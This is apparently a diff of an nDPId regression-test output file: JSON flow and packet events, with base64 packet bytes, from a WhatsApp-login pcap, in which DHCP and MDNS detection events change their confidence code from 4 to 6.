00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":852,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582271840,"flow_last_seen":1432582271840,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1432582271840,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00864{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":852,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1432582271840,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1432582271840,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIREwAAP8RdlkAAAAA\/\/\/\/\/wBEAEMBNOdgAQEGALYzLg0AAAAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwkBAwYPd1\/8LC45AgXcPQcB2DBiVgAcMwQAdqcADApMdWNhcy1pTWFj\/wAAAAAAAAAAAAAAAAAA"} -00742{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":852,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582271840,"flow_last_seen":1432582271840,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1432582271840,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"lucas-imac","fingerprint":"1,3,6,15,119,95,252,44,46","class_ident":""}} +00742{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":852,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582271840,"flow_last_seen":1432582271840,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1432582271840,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"lucas-imac","fingerprint":"1,3,6,15,119,95,252,44,46","class_ident":""}} 00864{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":853,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1432582273095,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1432582273095,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIRE0AAP8RdlgAAAAA\/\/\/\/\/wBEAEMBNOdeAQEGALYzLg0AAgAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwkBAwYPd1\/8LC45AgXcPQcB2DBiVgAcMwQAdqcADApMdWNhcy1pTWFj\/wAAAAAAAAAAAAAAAAAA"} 00864{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":854,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1432582275776,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1432582275776,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIRE4AAP8RdlcAAAAA\/\/\/\/\/wBEAEMBNOdcAQEGALYzLg0ABAAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwkBAwYPd1\/8LC45AgXcPQcB2DBiVgAcMwQAdqcADApMdWNhcy1pTWFj\/wAAAAAAAAAAAAAAAAAA"} 01131{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":855,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1432582276331,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1432582276331,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAISQGwAAEARsh7AqAIBwKgC\/0RcRFwB\/jsJeyJob3N0X2ludCI6IDMzNzUzNTk1OTMsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":859,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582284805,"flow_last_seen":1432582284805,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432582284805,"l3_proto":"ip4","src_ip":"169.254.166.207","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":859,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1432582284805,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1432582284805,"pkt":"AQBeAAD72DBiVgAcCABFAAA+cQoAAP8RGNup\/qbP4AAA+xTpFOkAKikcAAAAAAABAAAAAAAACkx1Y2FzLWlNYWMFbG9jYWwAAByAAQ=="} -00691{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":859,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582284805,"flow_last_seen":1432582284805,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432582284805,"l3_proto":"ip4","src_ip":"169.254.166.207","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}} +00691{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":859,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582284805,"flow_last_seen":1432582284805,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432582284805,"l3_proto":"ip4","src_ip":"169.254.166.207","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":860,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582284805,"flow_last_seen":1432582284805,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432582284805,"l3_proto":"ip6","src_ip":"fe80::da30:62ff:fe56:1c","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":860,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1432582284805,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":96,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":96,"pkt_l4_len":42,"thread_ts_msec":1432582284805,"pkt":"MzMAAAD72DBiVgAcht1gA4nLACoR\/\/6AAAAAAAAA2jBi\/\/5WABz\/AgAAAAAAAAAAAAAAAAD7FOkU6QAqIMQAAAAAAAEAAAAAAAAKTHVjYXMtaU1hYwVsb2NhbAAAHIAB"} -00696{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":860,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582284805,"flow_last_seen":1432582284805,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432582284805,"l3_proto":"ip6","src_ip":"fe80::da30:62ff:fe56:1c","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}} +00696{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":860,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582284805,"flow_last_seen":1432582284805,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432582284805,"l3_proto":"ip6","src_ip":"fe80::da30:62ff:fe56:1c","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":861,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582284806,"flow_last_seen":1432582284806,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432582284806,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":861,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1432582284806,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1432582284806,"pkt":"AQBeAAD7xiwDYGpkCABFAAA+TlkAAP8RybDAqAIB4AAA+xTpFOkAKrdAAAAAAAABAAAAAAAACkx1Y2FzLWlNYWMFbG9jYWwAAByAAQ=="} -00687{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":861,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582284806,"flow_last_seen":1432582284806,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432582284806,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}} +00687{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":861,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582284806,"flow_last_seen":1432582284806,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432582284806,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}} 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":862,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582284806,"flow_last_seen":1432582284806,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432582284806,"l3_proto":"ip6","src_ip":"fe80::c42c:3ff:fe60:6a64","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":862,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1432582284806,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":96,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":96,"pkt_l4_len":42,"thread_ts_msec":1432582284806,"pkt":"MzMAAAD7xiwDYGpkht1gAhHGACoR\/\/6AAAAAAAAAxCwD\/\/5gamT\/AgAAAAAAAAAAAAAAAAD7FOkU6QAqK3YAAAAAAAEAAAAAAAAKTHVjYXMtaU1hYwVsb2NhbAAAHIAB"} -00697{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":862,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582284806,"flow_last_seen":1432582284806,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432582284806,"l3_proto":"ip6","src_ip":"fe80::c42c:3ff:fe60:6a64","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}} +00697{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":862,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582284806,"flow_last_seen":1432582284806,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432582284806,"l3_proto":"ip6","src_ip":"fe80::c42c:3ff:fe60:6a64","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}} 00592{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":863,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1432582285047,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1432582285047,"pkt":"AQBeAAD72DBiVgAcCABFAACANrsAAP8RUuip\/qbP4AAA+xTpFOkAbF25AACEAAAAAAEAAAACCkx1Y2FzLWlNYWMFbG9jYWwAAByAAQAAAHgAEP6AAAAAAAAA2jBi\/\/5WABzADAABgAEAAAB4AASp\/qbPwAwAHIABAAAAeAAQ\/oAAAAAAAADaMGL\/\/lYAHA=="} -00701{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":863,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582284805,"flow_last_seen":1432582285047,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1432582285047,"l3_proto":"ip4","src_ip":"169.254.166.207","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}} +00701{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":863,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582284805,"flow_last_seen":1432582285047,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1432582285047,"l3_proto":"ip4","src_ip":"169.254.166.207","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}} 00590{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":864,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1432582285047,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1432582285047,"pkt":"AQBeAAD7xiwDYGpkCABFAACAD1QAAP8RCHTAqAIB4AAA+xTpFOkAbI9mAACEAAAAAAEAAAACCkx1Y2FzLWlNYWMFbG9jYWwAAByAAQAAAHgAEP6AAAAAAAAAxCwD\/\/5gamTADAABgAEAAAB4AATAqAIBwAwAHIABAAAAeAAQ\/oAAAAAAAADELAP\/\/mBqZA=="} -00697{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":864,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582284806,"flow_last_seen":1432582285047,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1432582285047,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}} +00697{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":864,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582284806,"flow_last_seen":1432582285047,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1432582285047,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}} 00620{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":865,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1432582285047,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":162,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":162,"pkt_l4_len":108,"thread_ts_msec":1432582285047,"pkt":"MzMAAAD7xiwDYGpkht1gAhHGAGwR\/\/6AAAAAAAAAxCwD\/\/5gamT\/AgAAAAAAAAAAAAAAAAD7FOkU6QBsA5wAAIQAAAAAAQAAAAIKTHVjYXMtaU1hYwVsb2NhbAAAHIABAAAAeAAQ\/oAAAAAAAADELAP\/\/mBqZMAMAAGAAQAAAHgABMCoAgHADAAcgAEAAAB4ABD+gAAAAAAAAMQsA\/\/+YGpk"} -00707{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":865,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582284806,"flow_last_seen":1432582285047,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1432582285047,"l3_proto":"ip6","src_ip":"fe80::c42c:3ff:fe60:6a64","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}} +00707{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":865,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582284806,"flow_last_seen":1432582285047,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1432582285047,"l3_proto":"ip6","src_ip":"fe80::c42c:3ff:fe60:6a64","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}} 00620{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":866,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1432582285047,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":162,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":162,"pkt_l4_len":108,"thread_ts_msec":1432582285047,"pkt":"MzMAAAD72DBiVgAcht1gA4nLAGwR\/\/6AAAAAAAAA2jBi\/\/5WABz\/AgAAAAAAAAAAAAAAAAD7FOkU6QBsVWEAAIQAAAAAAQAAAAIKTHVjYXMtaU1hYwVsb2NhbAAAHIABAAAAeAAQ\/oAAAAAAAADaMGL\/\/lYAHMAMAAGAAQAAAHgABKn+ps\/ADAAcgAEAAAB4ABD+gAAAAAAAANowYv\/+VgAc"} -00706{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":866,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582284805,"flow_last_seen":1432582285047,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1432582285047,"l3_proto":"ip6","src_ip":"fe80::da30:62ff:fe56:1c","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}} +00706{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":866,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582284805,"flow_last_seen":1432582285047,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1432582285047,"l3_proto":"ip6","src_ip":"fe80::da30:62ff:fe56:1c","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}} 00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":867,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1432582285062,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432582285062,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAABInyUAAEARVS\/AqAIBwKgC\/+EV4RUANKgAU3BvdFVkcDCYJeGQmjjiDQABAARIlcID1NylhjSgAeWF26p2NNVFJFGe2SE="} 